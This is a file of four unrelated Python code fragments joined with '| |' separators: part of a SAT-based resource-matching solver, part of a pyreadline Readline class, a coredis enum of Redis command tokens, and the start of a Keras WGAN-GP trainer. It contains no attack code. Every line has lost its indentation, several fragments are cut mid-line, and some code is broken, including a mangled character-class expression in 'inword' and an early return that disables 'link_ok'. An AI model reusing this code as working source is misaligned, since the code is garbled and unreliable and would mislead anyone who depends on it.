# It might be more efficient never to generate this match variable but it's only a unary clause..
return [x for x in [grounded_prop(prop, resource) for prop in constraint_clause] if x != [] and x is not False]
def grounded_prop(triple, resource, indent=""):
(truth, path, value) = triple
s = short_ids(resource)
#print indent+'need to ground', (truth, path, value), '\n '+indent+'with', follow_path(path, s['props'])
props = resource['props']
if isinstance(value, dict) and 'constraint__' in value:
if value['constraint__'] == '?': # choice
res = []
for sub_value in value['value__']:
grounded = grounded_prop((truth, path, sub_value), resource, indent + " ")
if grounded is True:
return True
elif grounded is not False and grounded != []:
res.append(grounded)
return res
elif value['constraint__'] == '[]': # One of a list
res_vals = follow_path(path, props)
return isinstance(res_vals, list) and value['value__'] in res_vals
elif value['constraint__'] in ['>=', '>', '<', '<=']:
res_val = follow_path(path, props)
#print 'here', value, res_val
if value['constraint__'] == '>=':
return res_val >= value['value__'] # brittle right now
elif value['constraint__'] == '>':
return res_val > value['value__'] # brittle right now
if value['constraint__'] == '<=':
return res_val <= value['value__'] # brittle right now
elif value['constraint__'] == '<':
return res_val < value['value__'] # brittle right now
else:
#print 'not currently translating the constraint:', value, 'on', props
print("not currently translating the constraint:")
print(value)
#print(on)
print(props)
# Will crash
else:
return 1
# Recursively walk a path on a dict. Returns None if there is no path.
def follow_path(path, d):
if path == []:
return d
elif path[0] in d:
return follow_path(path[1:], d[path[0]])
# Recursively walk over a resource given a constraint path, value and corresponding variable. Return +/-1
# depending on the values in the resource. Doesn't yet handle 'image' list of possible images.
def walk_resource_for_truth(d, path, value):
# print 'checking', path, '=', value, 'on', d
if not path or path[0] not in d:
return -1
elif len(path) == 1:
if d[path[0]] == value:
return 1
elif isinstance(value, str) and value.startswith('|>='): # Need the other cases
return 1 if d[path[0]] >= float(value[3:-1]) else -1
else:
return -1
elif isinstance(d[path[0]], dict):
return walk_resource_for_truth(d[path[0]], path[1:], value)
else:
return -1
# Define a variable stating that this resource satisfies this constraint
def resource_constraint_var(resource, path, value):
if isinstance(value, dict):
#print 'dict is', value
print("dict is %s" % value)
else:
return find_or_add_var(resource['id'] + path, value) # Equality variable
def link_ok(n1, n2, link_props, id_link_map, node_site_map):
#print 'checking', n1['props']['name'], n2['props']['name'], link_props
# Find the link, or allow if they are on different groups, assuming an internet link
# If they are on the same site, assume there's a switch. Otherwise assume a slow internet link
return True
if node_site_map[n1['id']] != node_site_map[n2['id']]:
#print ' link ok, they are on different sites'
return True
link = None
for ep in n1['endpoints']:
if ep['id'] not in id_link_map:
#print 'end point not linked:', ep['id']
continue
req_link = id_link_map[ep['id']]
other_ep = [epo['id'] for epo in req_link['endpoints'] if epo['id'] != ep['id']][0]
if other_ep in [ep2['id'] for ep2 in n2['endpoints']]:
#print ' link is', req_link
link = req_link
break
if link is None:
#print ' no link'
return False
return True
# Convenience. Return the variable that says this query node is matched to this resource node in the solution
def match_var(query_node, resource_node):
v, found = find_or_add_var(query_node['id'], resource_node['id'], '_matched_to_')
return v
# Return the variable that says this path should have this value. Create if necessary.
def find_or_add_var(path, value, relation="="):
global var_map, num_to_var
var_name = path + relation + str(value)
found = True
if var_name not in var_map:
found = False
var_map[var_name] = len(var_map) + 1
num_to_var[var_map[var_name]] = var_name
return var_map[var_name], found
# Functions that help manipulate sets of solutions.
def count_solutions(request, resources):
clauses = generate_clauses(request, resources)
#iter = pycosat.pycosat.itersolve(clauses)
iter = pycosat.itersolve(clauses)
count = 0
try:
while True:
iter.next()
count += 1
except:
return count
return count
# Assuming there is a solution using this set of resources, is there a solution with a smaller set?
# Inefficient to constantly re-generate the clauses but if there are not too many resources it's not too bad.
def sub_enclave_solution(request, resources):
sub_solutions = []
for res in resources:
sublist = list(resources)
sublist.remove(res)
names, solution = solve(request, sublist)
if solution is not None:
#print 'found a sub-enclave solution leaving out', res
print("found a sub-enclave solution leaving out %s " % res)
sub_solutions.append((names, solution))
return sub_solutions
# Take a list of enclaves and produce the list of property values for each property found for nodes. Will generalize.
def gather_properties(enclaves):
v = dict()
v['endpoints'] = dict()
for enclave in enclaves:
for n in enclave['nodes']:
if 'props' in n:
add_to_properties(n['props'], v)
if 'endpoints' in n:
for e in n['endpoints']:
if 'props' in e:
add_to_properties(e['props'], v['endpoints'])
return v
def add_to_properties(data, val_dict, indent=0):
for prop in data:
if prop == 'nic' or prop == 'name': # Remove these for now, though we could help a user address specific resources
continue
node_value = data[prop]
# Replace {'value__': X, 'constraint__': '='} with X. I don't see why resources would have other kinds of constraints
if type(node_value) is dict and 'value__' in node_value and 'constraint__' in node_value and node_value['constraint__'] == '=':
node_value = node_value['value__']
if type(node_value) is list:
if prop not in val_dict:
val_dict[prop] = set()
for val in node_value:
if isinstance(val, collections.Hashable): # Should recursively add values
val_dict[prop].add(val)
elif type(node_value) is dict: # Should recursively add values
#print ' '*indent, indent, 'recursively adding values for', prop, data[prop]
if prop not in val_dict:
val_dict[prop] = dict()
add_to_properties(node_value, val_dict[prop], indent + 2)
else:
if prop not in val_dict:
val_dict[prop] = set()
val_dict[prop].add(node_value)
# To help look at this, remove the long id names
ids = dict()
def short_ids(orig_site):
site = copy.deepcopy(orig_site)
rec_shorten_ids(site)
return site
def rec_shorten_ids(d):
for k in d:
if k in ['id', 'nic']:
if d[k] not in ids:
ids[d[k]] = len(ids)
d[k] = ids[d[k]]
elif isinstance(d[k], dict):
rec_shorten_ids(d[k])
elif isinstance(d[k], list):
for v in d[k]:
if isinstance(v, dict):
rec_shorten_ids(v)
def trySubsets(request, resources):
indexSet = set([])
indexSet.update(range(0, len(resources)))
combos = set([])
for i in range(1, len(resources)):
combos.update(set(itertools.combinations(indexSet, i)))
solutions = []
for combo in combos:
subresourcelist = []
for x in combo:
subresourcelist.append(resources[x])
names, solution = solve(request, subresourcelist)
print(list(combo))
comboResult = {}
comboResult['site_combo'] = list(combo)
if names != None:
print("Has solution:")
print(names)
comboResult['solution'] = True
else:
print("Has no solution")
comboResult['solution'] = False
solutions.append(comboResult)
print(solutions)
if __name__ == "__main__":
# Import json resources for the example sites
#root = "/Users/jim/repo/Projects/Bridge/CEF/git/xir/examples/"
root = ""
with open(root + "sites/emu.json") as f:
emu_json = json.load(f)
with open(root + "sites/cellular.json") as f:
cellular_json = json.load(f)
with open(root + "sites/iot.json") as f:
iot_json = json.load(f)
#with open(root + "experiments/small-world.json") as f:
# small_world_json = json.load(f)
with open(root + "experiments/test.json") as f:
small_world_json = json.load(f)
resources = [emu_json, cellular_json, iot_json]
r = gather_properties(resources)
#print(r['image'])
#exit()
trySubsets(small_world_json, resources)
exit()
# Solve the problem and look for solutions with fewer enclaves
print(small_world_json)
print(resources)
names, solution = solve(small_world_json, resources)
print("Names: ")
print(names)
print("Solutions ")
print(solution)
#print '\n** Seeking solutions with fewer groups of resources'
print("\n** Seeking solutions with fewer groups of resources")
sub_solutions = sub_enclave_solution(small_world_json, resources)
# Create ranges of possible values for features of requested nodes and networks based on the resources
ranges = gather_properties(resources)
# To count the number of solutions call this (may take time, not yet smart about combinatorics)
#print '\n** Counting | |
# -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (C) 2003-2006 <NAME>.
# Copyright (C) 2006 <NAME>. <<EMAIL>>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
# *****************************************************************************
''' an attempt to implement readline for Python in Python using ctypes'''
import os
import pyreadline.lineeditor.history as history
import pyreadline.lineeditor.lineobj as lineobj
import re
import sys
from pyreadline.keysyms.common import make_KeyPress_from_keydescr
import console
import logger
import release
from error import ReadlineError, GetSetError
from logger import log, log_sock
from modes import editingmodes
in_ironpython = "IronPython" in sys.version
if in_ironpython: # ironpython does not provide a prompt string to readline
import System
default_prompt = ">>> "
else:
default_prompt = ""
def quote_char(c):
if ord(c) > 0:
return c
def inword(buffer, point):
return buffer[point:point + 1] in [A - Za - z0 - 9]
class Readline(object):
def __init__(self):
self.startup_hook = None
self.pre_input_hook = None
self.completer = None
self.completer_delims = " \t\n\"\\'`@$><=;|&{("
self.console = console.Console()
self.size = self.console.size()
self.prompt_color = None
self.command_color = None
self.selection_color = self.console.saveattr << 4
self.key_dispatch = {}
self.previous_func = None
self.first_prompt = True
self.next_meta = False # True to force meta on next character
self.tabstop = 4
self.allow_ctrl_c = False
self.ctrl_c_tap_time_interval = 0.3
self.debug = False
self.begidx = 0
self.endidx = 0
# variables you can control with parse_and_bind
self.show_all_if_ambiguous = 'off'
self.mark_directories = 'on'
self.bell_style = 'none'
self.mark = -1
self.l_buffer = lineobj.ReadLineTextBuffer("")
self._history = history.LineHistory()
# this code needs to follow l_buffer and history creation
self.editingmodes = [mode(self) for mode in editingmodes]
for mode in self.editingmodes:
mode.init_editing_mode(None)
self.mode = self.editingmodes[0]
self.read_inputrc()
log("\n".join(self.rl_settings_to_string()))
# Paste settings
# assumes data on clipboard is path if shorter than 300 characters and doesn't contain \t or \n
# and replace \ with / for easier use in ipython
self.enable_ipython_paste_for_paths = True
# automatically convert tabseparated data to list of lists or array constructors
self.enable_ipython_paste_list_of_lists = True
self.enable_win32_clipboard = True
self.paste_line_buffer = []
# Below is for refactoring, raise errors when using old style attributes
# that should be refactored out
def _g(x):
def g(self):
raise GetSetError("GET %s" % x)
def s(self, q):
raise GetSetError("SET %s" % x)
return g, s
line_buffer = property(*_g("line_buffer"))
line_cursor = property(*_g("line_buffer"))
undo_stack = property(*_g("undo_stack")) # each entry is a tuple with cursor_position and line_text
history_length = property(*_g("history_length")) # each entry is a tuple with cursor_position and line_text
history = property(*_g("history")) # each entry is a tuple with cursor_position and line_text
history_cursor = property(*_g("history_cursor")) # each entry is a tuple with cursor_position and line_text
# To export as readline interface
def parse_and_bind(self, string):
'''Parse and execute single line of a readline init file.'''
try:
log('parse_and_bind("%s")' % string)
if string.startswith('#'):
return
if string.startswith('set'):
m = re.compile(r'set\s+([-a-zA-Z0-9]+)\s+(.+)\s*$').match(string)
if m:
var_name = m.group(1)
val = m.group(2)
try:
setattr(self, var_name.replace('-', '_'), val)
except AttributeError:
log('unknown var="%s" val="%s"' % (var_name, val))
else:
log('bad set "%s"' % string)
return
m = re.compile(r'\s*(.+)\s*:\s*([-a-zA-Z]+)\s*$').match(string)
if m:
key = m.group(1)
func_name = m.group(2)
py_name = func_name.replace('-', '_')
try:
func = getattr(self.mode, py_name)
except AttributeError:
log('unknown func key="%s" func="%s"' % (key, func_name))
if self.debug:
print 'pyreadline parse_and_bind error, unknown function to bind: "%s"' % func_name
return
self.mode._bind_key(key, func)
except:
log('error')
raise
def get_line_buffer(self):
'''Return the current contents of the line buffer.'''
return self.l_buffer.get_line_text()
def insert_text(self, string):
'''Insert text into the command line.'''
self.l_buffer.insert_text(string)
def read_init_file(self, filename=None):
'''Parse a readline initialization file. The default filename is the last filename used.'''
log('read_init_file("%s")' % filename)
# History file book keeping methods (non-bindable)
def add_history(self, line):
'''Append a line to the history buffer, as if it was the last line typed.'''
self._history.add_history(line)
def get_history_length(self):
'''Return the desired length of the history file.
Negative values imply unlimited history file size.'''
return self._history.get_history_length()
def set_history_length(self, length):
'''Set the number of lines to save in the history file.
write_history_file() uses this value to truncate the history file
when saving. Negative values imply unlimited history file size.
'''
self._history.set_history_length(length)
def clear_history(self):
'''Clear readline history'''
self._history.clear_history()
def read_history_file(self, filename=None):
'''Load a readline history file. The default filename is ~/.history.'''
self._history.read_history_file(filename)
def write_history_file(self, filename=None):
'''Save a readline history file. The default filename is ~/.history.'''
self._history.write_history_file(filename)
# Completer functions
def set_completer(self, function=None):
'''Set or remove the completer function.
If function is specified, it will be used as the new completer
function; if omitted or None, any completer function already
installed is removed. The completer function is called as
function(text, state), for state in 0, 1, 2, ..., until it returns a
non-string value. It should return the next possible completion
starting with text.
'''
log('set_completer')
self.completer = function
def get_completer(self):
'''Get the completer function.
'''
log('get_completer')
return self.completer
def get_begidx(self):
'''Get the beginning index of the readline tab-completion scope.'''
return self.begidx
def get_endidx(self):
'''Get the ending index of the readline tab-completion scope.'''
return self.endidx
def set_completer_delims(self, string):
'''Set the readline word delimiters for tab-completion.'''
self.completer_delims = string
def get_completer_delims(self):
'''Get the readline word delimiters for tab-completion.'''
return self.completer_delims
def set_startup_hook(self, function=None):
'''Set or remove the startup_hook function.
If function is specified, it will be used as the new startup_hook
function; if omitted or None, any hook function already installed is
removed. The startup_hook function is called with no arguments just
before readline prints the first prompt.
'''
self.startup_hook = function
def set_pre_input_hook(self, function=None):
'''Set or remove the pre_input_hook function.
If function is specified, it will be used as the new pre_input_hook
function; if omitted or None, any hook function already installed is
removed. The pre_input_hook function is called with no arguments
after the first prompt has been printed and just before readline
starts reading input characters.
'''
self.pre_input_hook = function
## Internal functions
def rl_settings_to_string(self):
out = ["%-20s: %s" % ("show all if ambigous", self.show_all_if_ambiguous)]
out.append("%-20s: %s" % ("mark_directories", self.mark_directories))
out.append("%-20s: %s" % ("bell_style", self.bell_style))
out.append("%-20s: %s" % ("mark_directories", self.mark_directories))
out.append("------------- key bindings ------------")
tablepat = "%-7s %-7s %-7s %-15s %-15s "
out.append(tablepat % ("Control", "Meta", "Shift", "Keycode/char", "Function"))
bindings = [(k[0], k[1], k[2], k[3], v.__name__) for k, v in self.mode.key_dispatch.iteritems()]
bindings.sort()
for key in bindings:
out.append(tablepat % (key))
return out
def _bell(self):
'''ring the bell if requested.'''
if self.bell_style == 'none':
pass
elif self.bell_style == 'visible':
raise NotImplementedError("Bellstyle visible is not implemented yet.")
elif self.bell_style == 'audible':
self.console.bell()
else:
raise ReadlineError("Bellstyle %s unknown." % self.bell_style)
def _clear_after(self):
c = self.console
x, y = c.pos()
w, h = c.size()
c.rectangle((x, y, w + 1, y + 1))
c.rectangle((0, y + 1, w, min(y + 3, h)))
def _set_cursor(self):
c = self.console
xc, yc = self.prompt_end_pos
w, h = c.size()
xc += self.l_buffer.visible_line_width()
while (xc >= w):
xc -= w
yc += 1
c.pos(xc, yc)
def _print_prompt(self):
c = self.console
x, y = c.pos()
n = c.write_scrolling(self.prompt, self.prompt_color)
self.prompt_begin_pos = (x, y - n)
self.prompt_end_pos = c.pos()
self.size = c.size()
def _update_prompt_pos(self, n):
if n != 0:
bx, by = self.prompt_begin_pos
ex, ey = self.prompt_end_pos
self.prompt_begin_pos = (bx, by - n)
self.prompt_end_pos = (ex, ey - n)
def _update_line(self):
c = self.console
c.cursor(0) # Hide cursor avoiding flicking
c.pos(*self.prompt_end_pos)
ltext = self.l_buffer.quoted_text()
if self.l_buffer.enable_selection and self.l_buffer.selection_mark >= 0:
start = len(self.l_buffer[:self.l_buffer.selection_mark].quoted_text())
stop = len(self.l_buffer[:self.l_buffer.point].quoted_text())
if start > stop:
stop, start = start, stop
n = c.write_scrolling(ltext[:start], self.command_color)
n = c.write_scrolling(ltext[start:stop], self.selection_color)
n = c.write_scrolling(ltext[stop:], self.command_color)
else:
n = c.write_scrolling(ltext, self.command_color)
x, y = c.pos() # Preserve one line for Asian IME(Input Method Editor) statusbar
w, h = c.size()
if y >= h - 1 or n > 0:
c.scroll_window(-1)
c.scroll((0, 0, w, h), 0, -1)
n += 1
self._update_prompt_pos(n)
if hasattr(c, "clear_to_end_of_window"): # Work around function for ironpython due
c.clear_to_end_of_window() # to System.Console's lack of FillFunction
else:
self._clear_after()
c.cursor(1) # Show cursor
self._set_cursor()
def readline(self, prompt=''):
return self.mode.readline(prompt)
def read_inputrc(self, inputrcpath=os.path.expanduser("~/pyreadlineconfig.ini")):
modes = dict([(x.mode, x) for x in self.editingmodes])
mode = self.editingmodes[0].mode
def setmode(name):
self.mode = modes[name]
def bind_key(key, name):
log("bind %s %s" % (key, name))
if hasattr(modes[mode], name):
modes[mode]._bind_key(key, getattr(modes[mode], name))
else:
print "Trying to bind unknown command '%s' | |
<filename>coredis/tokens.py
from __future__ import annotations
from coredis._utils import CaseAndEncodingInsensitiveEnum
class PureToken(CaseAndEncodingInsensitiveEnum):
"""
Enum for using pure-tokens with the redis api.
"""
#: Used by:
#:
#: - ``ACL LOG``
RESET = b"RESET"
#: Used by:
#:
#: - ``BGSAVE``
SCHEDULE = b"SCHEDULE"
#: Used by:
#:
#: - ``BITCOUNT``
#: - ``BITPOS``
BIT = b"BIT"
#: Used by:
#:
#: - ``BITCOUNT``
#: - ``BITPOS``
BYTE = b"BYTE"
#: Used by:
#:
#: - ``BITFIELD``
FAIL = b"FAIL"
#: Used by:
#:
#: - ``BITFIELD``
SAT = b"SAT"
#: Used by:
#:
#: - ``BITFIELD``
WRAP = b"WRAP"
#: Used by:
#:
#: - ``BLMOVE``
#: - ``BLMPOP``
#: - ``LMOVE``
#: - ``LMPOP``
LEFT = b"LEFT"
#: Used by:
#:
#: - ``BLMOVE``
#: - ``BLMPOP``
#: - ``LMOVE``
#: - ``LMPOP``
RIGHT = b"RIGHT"
#: Used by:
#:
#: - ``BZMPOP``
#: - ``ZINTER``
#: - ``ZINTERSTORE``
#: - ``ZMPOP``
#: - ``ZUNION``
#: - ``ZUNIONSTORE``
MAX = b"MAX"
#: Used by:
#:
#: - ``BZMPOP``
#: - ``ZINTER``
#: - ``ZINTERSTORE``
#: - ``ZMPOP``
#: - ``ZUNION``
#: - ``ZUNIONSTORE``
MIN = b"MIN"
#: Used by:
#:
#: - ``CLIENT CACHING``
#: - ``SCRIPT DEBUG``
NO = b"NO"
#: Used by:
#:
#: - ``CLIENT CACHING``
#: - ``SCRIPT DEBUG``
YES = b"YES"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
MASTER = b"MASTER"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
NORMAL = b"NORMAL"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
PUBSUB = b"PUBSUB"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
REPLICA = b"REPLICA"
#: Used by:
#:
#: - ``CLIENT KILL``
SLAVE = b"SLAVE"
#: Used by:
#:
#: - ``CLIENT NO-EVICT``
#: - ``CLIENT REPLY``
#: - ``CLIENT TRACKING``
OFF = b"OFF"
#: Used by:
#:
#: - ``CLIENT NO-EVICT``
#: - ``CLIENT REPLY``
#: - ``CLIENT TRACKING``
ON = b"ON"
#: Used by:
#:
#: - ``CLIENT PAUSE``
ALL = b"ALL"
#: Used by:
#:
#: - ``CLIENT PAUSE``
WRITE = b"WRITE"
#: Used by:
#:
#: - ``CLIENT REPLY``
SKIP = b"SKIP"
#: Used by:
#:
#: - ``CLIENT TRACKING``
BCAST = b"BCAST"
#: Used by:
#:
#: - ``CLIENT TRACKING``
NOLOOP = b"NOLOOP"
#: Used by:
#:
#: - ``CLIENT TRACKING``
OPTIN = b"OPTIN"
#: Used by:
#:
#: - ``CLIENT TRACKING``
OPTOUT = b"OPTOUT"
#: Used by:
#:
#: - ``CLIENT UNBLOCK``
ERROR = b"ERROR"
#: Used by:
#:
#: - ``CLIENT UNBLOCK``
TIMEOUT = b"TIMEOUT"
#: Used by:
#:
#: - ``CLUSTER FAILOVER``
#: - ``FAILOVER``
#: - ``SHUTDOWN``
#: - ``XCLAIM``
FORCE = b"FORCE"
#: Used by:
#:
#: - ``CLUSTER FAILOVER``
TAKEOVER = b"TAKEOVER"
#: Used by:
#:
#: - ``CLUSTER RESET``
HARD = b"HARD"
#: Used by:
#:
#: - ``CLUSTER RESET``
SOFT = b"SOFT"
#: Used by:
#:
#: - ``CLUSTER SETSLOT``
STABLE = b"STABLE"
#: Used by:
#:
#: - ``COPY``
#: - ``FUNCTION LOAD``
#: - ``FUNCTION RESTORE``
#: - ``MIGRATE``
#: - ``RESTORE``
REPLACE = b"REPLACE"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``ZADD``
GT = b"GT"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``ZADD``
LT = b"LT"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``GEOADD``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``SET``
#: - ``ZADD``
NX = b"NX"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``GEOADD``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``SET``
#: - ``ZADD``
XX = b"XX"
#: Used by:
#:
#: - ``FAILOVER``
#: - ``SHUTDOWN``
ABORT = b"ABORT"
#: Used by:
#:
#: - ``FLUSHALL``
#: - ``FLUSHDB``
#: - ``FUNCTION FLUSH``
#: - ``SCRIPT FLUSH``
ASYNC = b"ASYNC"
#: Used by:
#:
#: - ``FLUSHALL``
#: - ``FLUSHDB``
#: - ``FUNCTION FLUSH``
#: - ``SCRIPT DEBUG``
#: - ``SCRIPT FLUSH``
SYNC = b"SYNC"
#: Used by:
#:
#: - ``FUNCTION LIST``
WITHCODE = b"WITHCODE"
#: Used by:
#:
#: - ``FUNCTION RESTORE``
APPEND = b"APPEND"
#: Used by:
#:
#: - ``FUNCTION RESTORE``
FLUSH = b"FLUSH"
#: Used by:
#:
#: - ``GEOADD``
#: - ``ZADD``
CHANGE = b"CH"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
FT = b"FT"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
KM = b"KM"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
M = b"M"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
MI = b"MI"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
ANY = b"ANY"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
#: - ``SORT``
#: - ``SORT_RO``
ASC = b"ASC"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
#: - ``SORT``
#: - ``SORT_RO``
DESC = b"DESC"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHCOORD = b"WITHCOORD"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHDIST = b"WITHDIST"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHHASH = b"WITHHASH"
#: Used by:
#:
#: - ``GEOSEARCHSTORE``
STOREDIST = b"STOREDIST"
#: Used by:
#:
#: - ``GETEX``
PERSIST = b"PERSIST"
#: Used by:
#:
#: - ``HRANDFIELD``
WITHVALUES = b"WITHVALUES"
#: Used by:
#:
#: - ``LCS``
IDX = b"IDX"
#: Used by:
#:
#: - ``LCS``
LEN = b"LEN"
#: Used by:
#:
#: - ``LCS``
WITHMATCHLEN = b"WITHMATCHLEN"
#: Used by:
#:
#: - ``LINSERT``
AFTER = b"AFTER"
#: Used by:
#:
#: - ``LINSERT``
BEFORE = b"BEFORE"
#: Used by:
#:
#: - ``MIGRATE``
COPY = b"COPY"
#: Used by:
#:
#: - ``MIGRATE``
EMPTY_STRING = b""
#: Used by:
#:
#: - ``RESTORE``
ABSTTL = b"ABSTTL"
#: Used by:
#:
#: - ``SET``
GET = b"GET"
#: Used by:
#:
#: - ``SET``
KEEPTTL = b"KEEPTTL"
#: Used by:
#:
#: - ``SHUTDOWN``
NOSAVE = b"NOSAVE"
#: Used by:
#:
#: - ``SHUTDOWN``
NOW = b"NOW"
#: Used by:
#:
#: - ``SHUTDOWN``
SAVE = b"SAVE"
#: Used by:
#:
#: - ``SORT``
#: - ``SORT_RO``
SORTING = b"ALPHA"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
APPROXIMATELY = b"~"
#: Used by:
#:
#: - ``XADD``
AUTO_ID = b"*"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
EQUAL = b"="
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
MAXLEN = b"MAXLEN"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
MINID = b"MINID"
#: Used by:
#:
#: - ``XADD``
NOMKSTREAM = b"NOMKSTREAM"
#: Used by:
#:
#: - ``XAUTOCLAIM``
#: - ``XCLAIM``
JUSTID = b"JUSTID"
#: Used by:
#:
#: - ``XGROUP CREATE``
MKSTREAM = b"MKSTREAM"
#: Used by:
#:
#: - ``XGROUP CREATE``
#: - ``XGROUP SETID``
NEW_ID = b"$"
#: Used by:
#:
#: - ``XREADGROUP``
NOACK = b"NOACK"
#: Used by:
#:
#: - ``ZADD``
| |
import json
import os
import numpy as np
from keras.optimizers import RMSprop, Optimizer
from keras.models import Model
from keras.layers import Input, Dense
from keras.initializers import RandomNormal
from keras.utils import plot_model
from keras.layers import Layer
import keras.backend as K
from PIL import Image
from cv2 import cv2 as cv
import random
import time
from colorama import Fore
from functools import partial
from typing import Union
from collections import deque
from statistics import mean
import imagesize
from multiprocessing.pool import ThreadPool
from ..utils.batch_maker import BatchMaker
from ..models import discriminator_models_spreadsheet, generator_models_spreadsheet
from ..keras_extensions.custom_tensorboard import TensorBoardCustom
from ..utils.helpers import time_to_format, get_paths_of_files_from_path
from ..keras_extensions.custom_losses import wasserstein_loss, gradient_penalty_loss
# Weighted average function
class RandomWeightedAverage(Layer):
def __init__(self, batch_size:int):
super().__init__()
self.batch_size = batch_size
# Provides a (random) weighted average between real and generated image samples
def call(self, inputs, **kwargs):
weights = K.random_uniform((self.batch_size, 1, 1, 1))
return (weights * inputs[0]) + ((1 - weights) * inputs[1])
def compute_output_shape(self, input_shape):
return input_shape[0]
class WGANGC:
AGREGATE_STAT_INTERVAL = 1_000 # Interval of saving data
RESET_SEEDS_INTERVAL = 5_000 # Interval of reseting seeds for random generators
CHECKPOINT_SAVE_INTERVAL = 500 # Interval of saving checkpoint
def __init__(self, dataset_path:str,
gen_mod_name:str, critic_mod_name:str,
latent_dim:int,
training_progress_save_path:str,
generator_optimizer:Optimizer=RMSprop(0.00005), critic_optimizer:Optimizer=RMSprop(0.00005),
batch_size:int=32, buffered_batches:int=20,
generator_weights:Union[str, None]=None, critic_weights:Union[str, None]=None,
critic_gradient_penalty_weight:float=10,
start_episode:int=0, load_from_checkpoint:bool=False,
check_dataset:bool=True, num_of_loading_workers:int=8):
self.critic_mod_name = critic_mod_name
self.gen_mod_name = gen_mod_name
self.latent_dim = latent_dim
assert self.latent_dim > 0, Fore.RED + "Invalid latent dim" + Fore.RESET
self.batch_size = batch_size
assert self.batch_size > 0, Fore.RED + "Invalid batch size" + Fore.RESET
self.progress_image_dim = (16, 9)
if start_episode < 0: start_episode = 0
self.episode_counter = start_episode
# Initialize training data folder and logging
self.training_progress_save_path = training_progress_save_path
self.training_progress_save_path = os.path.join(self.training_progress_save_path, f"{self.gen_mod_name}__{self.critic_mod_name}__{self.latent_dim}")
self.tensorboard = TensorBoardCustom(log_dir=os.path.join(self.training_progress_save_path, "logs"))
# Create array of input image paths
self.train_data = get_paths_of_files_from_path(dataset_path, only_files=True)
assert self.train_data, Fore.RED + "Training dataset is not loaded" + Fore.RESET
# Load one image to get shape of it
tmp_image = cv.imread(self.train_data[0])
self.image_shape = tmp_image.shape
self.image_channels = self.image_shape[2]
# Check image size validity
if self.image_shape[0] < 4 or self.image_shape[1] < 4: raise Exception("Images too small, min size (4, 4)")
# Check validity of datasets
if check_dataset:
self.validate_dataset()
# Define static vars
if os.path.exists(f"{self.training_progress_save_path}/static_noise.npy"):
self.static_noise = np.load(f"{self.training_progress_save_path}/static_noise.npy")
if self.static_noise.shape[0] != (self.progress_image_dim[0] * self.progress_image_dim[1]):
print(Fore.YELLOW + "Progress image dim changed, restarting static noise!" + Fore.RESET)
os.remove(f"{self.training_progress_save_path}/static_noise.npy")
self.static_noise = np.random.normal(0.0, 1.0, size=(self.progress_image_dim[0] * self.progress_image_dim[1], self.latent_dim))
else:
self.static_noise = np.random.normal(0.0, 1.0, size=(self.progress_image_dim[0] * self.progress_image_dim[1], self.latent_dim))
self.kernel_initializer = RandomNormal(stddev=0.02)
# Build critic block
self.critic = self.build_critic(critic_mod_name)
# Build generator block
self.generator = self.build_generator(gen_mod_name)
